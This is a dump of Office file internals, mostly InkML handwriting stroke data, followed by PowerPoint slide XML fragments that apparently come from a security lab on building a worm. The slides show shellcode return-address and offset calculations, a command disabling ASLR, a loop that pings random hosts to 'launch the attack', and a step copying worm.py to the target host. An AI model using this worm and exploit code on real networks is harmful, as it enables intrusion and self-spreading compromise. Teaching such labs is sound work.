0,-24 9 0,20-10-1365,3 0-5461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1:35.286"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'-1'48'0,"3"59"0,-2-105 0,0 0 0,1 1 0,-1-1 0,1 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,1 0 0,-1 0 0,1 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1-1 0,-1 1 0,0-1 0,6 1 0,7 1 0,1-1 0,0-1 0,29-4 0,-14 2 0,-8 0 66,38-8-1,13-1-1561,-56 10-5330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2:41.026"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">115 95 24575,'0'1'0,"0"0"0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,-2 0 0,-24 13 0,20-10 0,3-2 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,1 0 0,-1 0 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,-3 6 0,4-4 0,-1 1 0,1-1 0,1 1 0,-1 0 0,1 0 0,0 0 0,1 0 0,0 10 0,0 13 0,4 121 0,-4-145 0,2 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,0 0 0,1-1 0,0 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,1-1 0,1 1 0,-1-1 0,6 5 0,-4-5 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1-1 0,0 0 0,1 0 0,-1 0 0,0-1 0,1 0 0,-1-1 0,12 1 0,56-2 0,-48-1 0,-1 2 0,1 0 0,51 10 0,-51-6 0,51 3 0,8 1 0,-65-5 0,-1-1 0,1-1 0,0-1 0,42-3 0,-54 1 0,0 0 0,0-1 0,0-1 0,0 1 0,0-2 0,0 1 0,-1-1 0,0 0 0,0-1 0,0 0 0,0 0 0,-1-1 0,11-9 0,-8 3 0,0 1 0,11-20 0,15-16 0,-31 40 0,0 0 0,0-1 0,0 1 0,-1-1 0,0 0 0,0 0 0,-1 0 0,0 0 0,-1-1 0,0 1 0,2-16 0,-1-8 0,-2-59 0,-2 61 0,1 25 0,-1 0 0,1 0 0,-2 0 0,1 0 0,0 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,0-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 1 0,0 0 0,0 0 0,-1 0 0,-4-2 0,-8-5 0,-1 2 0,1 0 0,-2 2 0,-32-9 0,36 12 0,-1 1 0,0 0 0,-27 1 0,28 1 0,0 0 0,-1-1 0,1-1 0,-18-4 0,-3-1 0,-1 2 0,1 1 0,-1 2 0,-72 4 0,21 1 0,44-3-1365,25 0-5461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2:43.229"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1003 24575,'30'-10'0,"-14"3"0,2 0 0,-1-1 0,1-1 0,27-18 0,-29 16 0,0 1 0,1 1 0,0 1 0,18-6 0,22-13 0,-13 6 0,11 2 0,-36 14 0,-1-1 0,0-1 0,17-10 0,-18 9 0,1 1 0,0 0 0,0 1 0,20-4 0,22-6 0,-44 11 0,0 2 0,1 0 0,28-2 0,6 0 0,595-103-4412,-208 31 2040,-22-6 6062,-48 8-596,481-105-3094,-701 146 0,277-27 0,-196 29 0,-158 19 0,1 3 0,74-1 0,7 1 0,-7-1 0,176 11-1365,-285 0-5461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23:52:47.082"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'14'-1'0,"0"1"0,1 1 0,-1 0 0,0 1 0,0 0 0,0 1 0,0 1 0,0 0 0,-1 1 0,1 1 0,-1 0 0,-1 1 0,1 0 0,-1 0 0,22 20 0,-29-23 0,54 48 0,73 47 0,-129-96 0,1 0 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 0 0,-1 1 0,1 0 0,-1-1 0,0 1 0,-1-1 0,1 1 0,-1 0 0,0 0 0,0-1 0,-2 10 0,2-7 0,-1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,-1-1 0,1 1 0,-1-1 0,-1 1 0,1-1 0,-1 0 0,0 0 0,-1-1 0,-7 9 0,-77 65 0,32-13 109,42-46-846,-31 31 0,30-37-6089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50.780"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">4507 0 24575,'-1'2'0,"0"1"0,1-1 0,-1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 0,0-1 0,0 0 0,-3 2 0,-18 17 0,12-4 0,0 0 0,-1-1 0,-1-1 0,0 0 0,0 0 0,-2-2 0,-19 15 0,22-20 0,0 0 0,-1-1 0,-12 4 0,13-6 0,0 1 0,1 0 0,0 1 0,-15 10 0,-25 22 0,-2-4 0,-1-1 0,-67 28 0,54-25 0,45-24 0,0 0 0,-39 14 0,-160 28 0,199-48 0,1 1 0,-1 1 0,1 0 0,-21 12 0,-30 13 0,45-22 0,1 1 0,0 2 0,-39 26 0,-63 60 0,122-95 0,-10 6 0,-1 0 0,0-1 0,-1-1 0,1-1 0,-2 0 0,-27 7 0,21-7 0,1 1 0,0 1 0,-27 15 0,-22 11 0,20-12 0,-139 65 0,126-61 0,-38 20 0,75-32 0,0 1 0,1 1 0,1 1 0,1 2 0,-30 31 0,7-7 0,-1-1 0,-60 38 0,67-50 0,12-12 0,24-16 0,0 0 0,0 0 0,1 1 0,0 0 0,0 0 0,-7 7 0,4-2 0,0-1 0,-1 0 0,-1-1 0,1 0 0,-1-1 0,-13 7 0,-8 5 0,14-6 0,0 1 0,-26 28 0,-18 14 0,15-18 0,25-19 0,-34 22 0,14-14 0,1 3 0,1 1 0,-44 45 0,34-13 0,40-48 0,-1-1 0,-1 0 0,-20 19 0,3-5 0,-48 58 0,45-48 0,-98 131 0,101-129 0,-51 54 0,51-62 0,-32 37 0,-54 52 0,95-100 0,0 2 0,1 0 0,2 0 0,-22 40 0,6-13 0,26-37 0,1 0 0,-1 1 0,2 0 0,-4 14 0,-11 26 0,16-42 0,0 1 0,0 0 0,-3 24 0,5-22 0,-1 0 0,-8 22 0,5-17 0,1-1 0,0 1 0,-2 33 0,4-31 0,-1 1 0,-7 28 0,-3-9 0,5-20 0,2 1 0,0 0 0,2 0 0,1 1 0,-3 35 0,6-41 0,-1 0 0,-1 0 0,-1-1 0,-8 23 0,7-22 0,0-1 0,1 1 0,1 0 0,-2 22 0,5-2 0,-2 0 0,-9 43 0,-22 142 0,23-150 0,6-43 0,-3 45 0,7-40 0,0 8 0,-1-1 0,-10 61 0,4-49 0,2 1 0,3 0 0,5 55 0,-1-5 0,-2 719 0,1-797 0,2-1 0,7 31 0,-2-11 0,-2-19 0,1 0 0,13 34 0,-12-41 0,-2 0 0,0 0 0,-1 0 0,-1 0 0,3 32 0,-6-30 0,2 0 0,0 0 0,2-1 0,9 30 0,-6-24 0,4 19 0,7 55 0,-17-91 0,1 0 0,0 0 0,0-1 0,7 15 0,-5-15 0,-1-1 0,-1 1 0,0 0 0,0 1 0,2 17 0,-2-1 0,2-1 0,0 1 0,2-1 0,0 0 0,18 38 0,11 34 0,9 21 0,-23-66 0,-11-25 0,22 39 0,-29-58 0,2 0 0,-1-1 0,1 0 0,0 0 0,0 0 0,1 0 0,0-1 0,14 10 0,92 62 0,13 9 0,-66-50 0,75 43 0,-66-39 0,-48-27 0,36 18 0,-18-7 0,-33-21 0,0 0 0,0 0 0,0 0 0,0-1 0,1 0 0,8 3 0,80 22 0,106 48 0,-58-23 0,-91-37 0,57 28 0,-83-32 0,1-2 0,47 11 0,-6-2 0,-27-5 0,-15-5 0,0-1 0,0 0 0,1-2 0,0-2 0,51 4 0,-40-9 0,0 2 0,64 11 0,40 11 0,-127-21 0,-1 0 0,1 0 0,-1-1 0,1-1 0,-1-1 0,1 0 0,-1-1 0,0 0 0,0-1 0,1-1 0,-2 0 0,21-9 0,-16 7 0,1 1 0,28-4 0,-4 1 0,7 0 0,-97 4-1365,32-1-5461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36:52.198"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'6'0'0,"0"0"0,1 0 0,-1 1 0,0 0 0,0 0 0,0 0 0,0 1 0,0 0 0,0 0 0,-1 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 1 0,0 0 0,-1 0 0,1 0 0,-1 1 0,6 6 0,-3-3 0,0-1 0,1-1 0,-1 1 0,2-1 0,13 8 0,-13-8 0,1 0 0,-1 1 0,16 15 0,-12-9 0,1-1 0,1-1 0,0 0 0,0-1 0,22 11 0,13 9 0,-48-29 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 1 0,0-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,-2 3 0,-6 6 0,0 1 0,-1-2 0,0 1 0,-23 15 0,13-9 0,-2 1-119,-34 33 370,52-45-401,0 0 1,0 0-1,0 0 0,1 0 1,-1 1-1,1-1 0,1 1 0,-1 0 1,-2 10-1,2-1-6676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50:22.087"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'0'8'0,"2"0"0,-1-1 0,1 1 0,0 0 0,1-1 0,-1 0 0,2 1 0,-1-1 0,1-1 0,8 13 0,-6-10 0,-1 0 0,1 1 0,-2 0 0,7 17 0,-8-16 0,2 1 0,0-1 0,0-1 0,12 18 0,5 12 0,27 31 0,-19-7 0,2-2 0,3-1 0,51 67 0,-77-115 0,0 0 0,-1 1 0,-1 0 0,11 30 0,-12-28 0,0 0 0,2 0 0,16 26 0,144 194 0,-115-140 0,-16-27 0,-24-43 0,0 0 0,11 38 0,-16-40 0,2 1 0,0-2 0,21 35 0,8 15 0,-32-55 0,2-1 0,0-1 0,17 24 0,-18-29 0,-1 0 0,0 1 0,-1 0 0,8 22 0,12 23 0,-14-32 0,18 50 0,4 8 0,-28-69 0,0 1 0,-2 0 0,4 16 0,13 36 0,24 50 0,-24-61 0,31 62 0,-38-87 0,-1 0 0,-2 0 0,12 51 0,-10-30 0,34 78 0,-5-16 0,-41-111 0,8 28 0,8 42 0,3 20 0,-13-66 0,-1 0 0,-2 0 0,3 44 0,-7-41 0,-1-2 0,2 0 0,0 0 0,10 47 0,-5-40 0,-2 1 0,-1 0 0,-2 0 0,-4 42 0,1 4 0,2-48 0,-2 1 0,-9 51 0,5-55 0,3-11 0,-1 0 0,-1 0 0,-1 0 0,-8 19 0,9-26 0,1 1 0,1 0 0,0 0 0,1 1 0,0-1 0,1 0 0,1 1 0,1-1 0,1 15 0,0-12 0,-1 0 0,-1 1 0,-1-1 0,-1 0 0,-5 29 0,-24 43 0,16-46 0,-12 55 0,18-67 0,0 0 0,-3-1 0,-22 45 0,16-38 0,-17 53 0,27-62 0,-2-1 0,0 0 0,-2-1 0,-22 36 0,17-32 0,1 1 0,-16 46 0,20-47 0,0-1 0,-2 0 0,-20 31 0,-33 27 0,57-71 0,1 1 0,0-1 0,1 1 0,-11 37 0,0 0 0,12-41 0,0-1 0,0 1 0,-1-1 0,-1-1 0,0 1 0,-10 9 0,11-12 0,3-2 0,0 0 0,1 0 0,0 0 0,0 0 0,1 1 0,0-1 0,0 1 0,1 0 0,-2 14 0,2-12 0,-1-1 0,1 1 0,-1-1 0,-1 0 0,-8 16 0,-16 24 0,18-32 0,0 0 0,-1 0 0,0-1 0,-20 21 0,18-22 0,0 0 0,2 1 0,0 0 0,0 1 0,2 0 0,0 1 0,-11 30 0,19-45 9,0-1 1,0 0-1,-1 0 0,1 1 0,0-1 1,-1 0-1,0 0 0,0 0 0,1-1 0,-1 1 1,0 0-1,-4 2 0,5-4-62,0 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0-1,0 0 1,0 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,0 0 0,-1-1 0,1 1 0,0-1 0,0 1 0,0-1 0,0 0 0,-1 0 0,-7-8-6773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20:50:23.925"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">20 0 24575,'1'17'0,"1"0"0,6 29 0,-4-28 0,0 0 0,0 22 0,-3-13 0,-3 192 0,-6-177 0,7-40 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,-1 1 0,1 0 0,0-1 0,-1 0 0,-2 3 0,3-4 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1-1 0,0 1 0,-1 0 0,1-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,1-25 0,1 22 0,-1 1 0,1-1 0,0 0 0,0 1 0,1-1 0,-1 1 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,1 1 0,-1 0 0,0-1 0,1 1 0,-1 0 0,1 0 0,0 1 0,4-2 0,10-2 0,0 0 0,0 1 0,21-1 0,26-7 0,-56 10-68,13-6-148,1 1-1,1 1 1,-1 1 0,1 2 0,30-2 0,-35 5-6610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29:42.939"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.025" units="cm"/>
      <inkml:brushProperty name="height" value="0.025" units="cm"/>
      <inkml:brushProperty name="color" value="#AB008B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 11734 24575,'45'0'0,"0"3"0,62 11 0,-38-6 0,0-2 0,125-7 0,-72-1 0,-94 0 0,0 0 0,33-9 0,-30 6 0,47-4 0,499 8 0,-279 3 0,-243-6 0,0-2 0,0-2 0,62-18 0,-106 23 0,156-51 0,-122 38 0,1-3 0,-32 12 0,0 1 0,0 1 0,1 0 0,28-5 0,-25 7 0,1-1 0,-1-1 0,30-12 0,-1 0 0,70-6 0,-84 15 0,0 2 0,39-1 0,28-6 0,-19-1 0,-21 4 0,110-33 0,-131 32 0,61-11 0,-30 8 0,-27 7 0,-32 6 0,-1-1 0,1 1 0,-1-2 0,1 0 0,-1 0 0,0 0 0,0-1 0,0-1 0,-1 0 0,15-10 0,-10 4 0,0 1 0,25-13 0,-24 15 0,-1-1 0,0 0 0,13-13 0,-21 17 0,0 1 0,1 0 0,-1 0 0,1 1 0,0 0 0,0 0 0,0 0 0,0 1 0,9-2 0,-6 2 0,-1-1 0,0 0 0,0-1 0,16-8 0,78-55 0,-95 63 0,-1 0 0,1 1 0,0 0 0,0 0 0,1 1 0,-1 0 0,13-1 0,-12 2 0,0 0 0,-1-1 0,1 0 0,0-1 0,-1 0 0,15-7 0,69-40 0,-54 31 0,-1-2 0,-1-2 0,48-37 0,-38 20 0,96-62 0,-113 83 0,-14 9 0,-1 1 0,1 1 0,0 0 0,1 1 0,0 0 0,0 1 0,18-4 0,2 2 0,-1-2 0,63-26 0,62-42 0,-121 58 0,7-6 0,45-34 0,19-11 0,-97 62 0,0 0 0,-1 0 0,17-17 0,17-14 0,52-13 0,-86 43 0,0 0 0,-1-1 0,0 0 0,12-16 0,8-9 0,-16 21 0,1 2 0,0 0 0,33-19 0,-28 18 0,35-29 0,11-10 0,-39 32 0,27-27 0,-23 21 0,-24 21 0,0 0 0,0-1 0,10-13 0,2-3 0,1 0 0,0 2 0,2 0 0,31-23 0,48-39 0,-13 8 0,-42 36 0,77-84 0,-93 91 0,-16 14 0,-2 1 0,0-2 0,14-25 0,-16 24 0,2 0 0,0 1 0,18-20 0,-5 8 0,-19 22 0,1 0 0,0 0 0,14-12 0,59-37 0,-75 52 0,-1 0 0,0 0 0,0-1 0,-1 0 0,0 0 0,6-12 0,16-27 0,-16 32 0,-1 0 0,15-30 0,-5 8 0,-11 21 0,1 1 0,0 0 0,1 0 0,1 1 0,14-14 0,-16 18 0,-1-1 0,0 0 0,8-14 0,-9 13 0,0 1 0,0 0 0,17-17 0,0 4 0,31-41 0,-3 2 0,-44 52 0,-1-1 0,0 0 0,0-1 0,-1 1 0,-1-1 0,0 0 0,4-14 0,9-20 0,-14 35 0,2 0 0,-1 1 0,1 0 0,1 1 0,0-1 0,0 1 0,0 0 0,1 1 0,1 0 0,11-9 0,-13 11 0,0 0 0,0 0 0,0-1 0,-1 0 0,0-1 0,0 1 0,6-12 0,29-63 0,-1 2 0,-26 55 0,19-51 0,-24 53 0,0 1 0,2 1 0,20-33 0,-18 33 0,-1 0 0,-1-1 0,-1 0 0,8-27 0,-7 20 0,26-50 0,-18 40 0,23-63 0,-18 40 0,-13 30 0,14-61 0,5-20 0,-26 102 0,-2 1 0,1-1 0,0-12 0,-3 15 0,1 1 0,0 0 0,0 0 0,1 0 0,0 0 0,0 0 0,1 1 0,0-1 0,5-9 0,1 2 0,-2 0 0,0-1 0,0 0 0,-1 0 0,-1 0 0,-1-1 0,5-27 0,8-27 0,26-80 0,-28 60 0,-3 11 0,5 20 0,-11 43 0,-1 0 0,-1 0 0,-1-1 0,2-18 0,-4 0 0,-2 26 0,1 0 0,0 0 0,1 0 0,0 0 0,0 0 0,1 0 0,0 1 0,0-1 0,1 0 0,7-14 0,-2 7 0,0-1 0,-1 0 0,-1 0 0,-1 0 0,0-1 0,2-19 0,0 3 0,-4 12 0,0 0 0,0-31 0,-3 33 0,1 0 0,1 0 0,6-27 0,-1 16 0,-3-1 0,0 1 0,-2-1 0,-3-41 0,0 38 0,2 0 0,1 0 0,8-40 0,26-123 0,-29 142 0,-2 0 0,-2 0 0,-6-65 0,1 15 0,2-515 0,-1 604 0,-1 0 0,0 0 0,-7-23 0,4 20 0,-5-39 0,-4-51 0,8 70 0,-3-62 0,6 65 0,-12-69 0,6 51 0,-20-87 0,4 15 0,15 88 0,2-1 0,2-1 0,-2-50 0,8 79 0,1-10 0,-1-1 0,0 1 0,-2 0 0,-1 0 0,-1 0 0,0 1 0,-14-37 0,-3 0 0,-24-96 0,10 27 0,30 110 0,-2 1 0,1 0 0,-2 1 0,-1 0 0,-12-19 0,-4 2 0,-32-32 0,-28-44 0,69 84 0,0 1 0,-2 1 0,-1 1 0,-1 0 0,0 1 0,-29-20 0,2 10 0,26 18 0,1-1 0,-36-31 0,47 38 0,0-1 0,0 1 0,0 1 0,-1 0 0,1 0 0,-1 1 0,-13-4 0,10 4 0,1-1 0,0 0 0,0-1 0,-18-11 0,-131-97 0,147 105 0,0 1 0,-1 0 0,-20-7 0,18 8 0,-1-1 0,-19-12 0,-110-81 0,119 85 0,-1 0 0,-45-16 0,49 22 0,0 0 0,1-2 0,0-1 0,-34-24 0,-18-34 0,8 7 0,62 59 0,0 1 0,0 0 0,-1 1 0,0-1 0,0 1 0,0 1 0,-14-4 0,-56-8 0,43 10 0,1-4 0,0-1 0,1-2 0,-48-22 0,62 26 0,-19-14 0,30 16 0,0 1 0,0 0 0,-1 0 0,0 1 0,-11-4 0,-66-18 0,59 16 0,1 1 0,-2 1 0,1 2 0,-32-4 0,34 7 0,1-2 0,0-1 0,0-1 0,0-1 0,-29-14 0,21 9 0,-55-14 0,50 17 0,1-1 0,-43-19 0,72 26 0,1 0 0,-1 0 0,1 0 0,0-1 0,0 0 0,0 0 0,1 0 0,0-1 0,-7-7 0,-30-51 0,32 46 0,-1 1 0,-12-15 0,-4 4 0,-14-21 0,29 34 0,0 1 0,-1 0 0,-23-19 0,20 18 0,0 0 0,-15-19 0,-11-18 0,-75-72 0,107 114 0,0-1 0,1-1 0,-8-12 0,11 14 0,-1 1 0,1 0 0,-2 0 0,1 1 0,-1 0 0,0 0 0,-12-9 0,4 8 0,-1 0 0,0 1 0,-1 1 0,1 0 0,-1 1 0,-33-5 0,-5-2 0,34 7 0,5 0 0,0 1 0,-1 0 0,1 1 0,-1 1 0,0 1 0,-30 1 0,45 0 0,0 0 0,1 1 0,-1-1 0,0 0 0,0 1 0,0-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,1 3 0,1 8 0,2 0 0,0 0 0,0-1 0,11 22 0,-1-1 0,17 51 0,71 132 0,-87-188 0,-1 1 0,-1 1 0,-2 0 0,13 53 0,-24-81-4,0 1 0,1-1 0,-1 0-1,1 0 1,0 0 0,-1 1 0,1-1-1,0 0 1,1 0 0,-1 0 0,0 0-1,0-1 1,1 1 0,-1 0 0,1 0 0,0-1-1,-1 1 1,3 1 0,-2-2 16,0-1-1,0 1 1,0 0 0,0-1 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0-1 0,0 1-1,0 0 1,3-2 0,5-2-260,1-1 1,-1-1-1,0 1 1,-1-2-1,16-11 1,-11 6-6579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pelias/docker/issues/23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stackoverflow.com/questions/48957195/how-to-fix-docker-got-permission-denied-issue/48957722#4895772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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sysctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kernel.randomize_va_space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1506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ret    = 0xffffd588 + 500 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(shellcode)  # Need to change</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> offset = 0xffffd5f8 - 0xffffd588 +4  # Need to change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420682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while True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>      a = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>randint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(151, 153)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>      b = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>randint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(71, 75)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>      #a = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>randint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(151, 183)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>      #b = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>randint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(70, 100)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ipaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = f"10.{a}.0.{b}"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>      # Get the output of the ping command, look for "1 received" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>      output = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>subprocess.check_output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>f"ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -q -c1 -W1 {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ipaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}", shell=True)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>      result = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>output.find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(b'1 received')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>      if result == -1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>         print(f"{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ipaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>} is not alive", flush=True)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>      else:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>         print(f"*** {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ipaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>} is alive, launch the attack", flush=True)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>         return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ipaddr</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2865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Send a copy of this program (worm.py) to the target host    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>subprocess.run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
